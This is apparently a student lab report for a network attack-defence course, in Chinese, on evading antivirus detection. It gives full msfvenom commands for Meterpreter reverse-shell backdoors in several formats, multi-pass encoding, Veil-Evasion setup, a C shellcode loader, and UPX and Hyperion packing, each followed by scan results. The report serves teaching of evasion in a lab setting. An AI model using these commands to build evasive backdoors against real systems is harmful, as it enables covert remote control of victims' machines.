2018-2019-2 网络对抗技术 20165334 Exp3 免杀原理与实践
一、实验内容
任务一正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,利用shellcode编程等免杀工具或技巧
1、使用msf编码器,生成exe文件
- 使用exp2中生产的后门程序
20165334_backdoor.exe利用VirusTotal网站进行扫描检测。
20165334_backdoor.exe利用Virscan网站进行扫描检测。
-使msf编码器对后门程序进行多次的编码,并检测。
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 15 -b ‘\x00’ LHOST=192.168.56.102 LPORT=5334 -f exe > met-lt5334l.exe
用使用virscan进行扫描,结果如下所示
- msfvenom生成jar文件
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=5334 x> ltl_backdoor_java.jar - 用使用virscan进行扫描,结果如下所示
- msfvenom生成php文件
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.102 LPORT=5334 x> 20155334_backdoor.php 用使用virscan进行扫描,结果如下所示
2、使用veil-evasion生成后门程序及检测
- 用
sudo apt-get install veil命令安装Veil,若遇到问题则用sudo apt-get upgrade这两个命令更新一下软件包即可之后用veil打开veil,输入y继续安装直至完成。
-设置反弹连接IPset LHOST 192.168.56.102(IP是KaliIP) - 设置端口
set LPORT 5334
- 输入
generate生成文件,接着输入你想要playload的名字:baddoor5334
扫描检测
3、半手工注入Shellcode并执行
- 使用命令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.102LPORT=5334 -f c用c语言生成一段shellcode
-利用上面生成的数组拿来编写一个程序,结构如下
unsigned char buf[] =
"此处复制粘贴之前用msf生成的buf"
int main()
{
int (*func)() = (int(*)())buf;
func();
}- 使用命令
i686-w64-mingw32-g++ shell5334.c -o shell5334.exe编译
- 扫描检测
-x尝试运行结果被360拦截了。
以上尝试可以看出没有处理的后门程序基本上都可以检测出来。
加壳
- 压缩壳 :减少应用体积,如ASPack,UPX
加密壳: 版权保护,反跟踪。如ASProtect,Armadillo
虚拟机 :通过类似编译手段,将应用指令转换为自己设计的指令集。如VMProtect,Themida
1、使用压缩壳(UPX)
还是没能幸免,立刻被杀软截杀
在360中添加信任后测试其可用性。
2、加密壳Hyperion
- 将上一个生成的文件拷贝到
/usr/share/windows-binaries/hyperion/目录中 - 进入目录
/usr/share/windows-binaries/hyperion/中 - 输入命令
wine hyperion.exe -v sxx_upxed.exe sxx_upxed_Hyperion.exe进行加壳 
反弹连接
检测结果
